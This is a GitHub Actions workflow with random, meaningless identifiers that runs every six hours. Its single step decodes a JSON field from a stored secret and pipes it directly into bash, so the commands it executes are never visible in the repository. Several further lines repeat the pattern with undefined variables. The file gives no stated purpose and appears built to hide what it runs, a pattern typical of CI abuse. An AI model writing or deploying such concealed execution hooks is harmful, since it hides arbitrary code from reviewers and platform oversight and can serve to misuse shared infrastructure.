name: zhengcunzai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '15 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhengcunzai3456
        env:
          fmxp36093: ${{ secrets.fmxp36093 }}
        run: |
          echo $fmxp36093 | jq -r .chjla229 | /bin/bash
          echo $xjch72 | jq -r .juqc7625 | /bin/bash
          echo $pr12 | jq -r .jfkyw500 | /bin/bash
          echo $swdj16768 | jq -r .sozgh7912 | /bin/bash
          echo $rnu3165 | jq -r .grt612 | /bin/bash

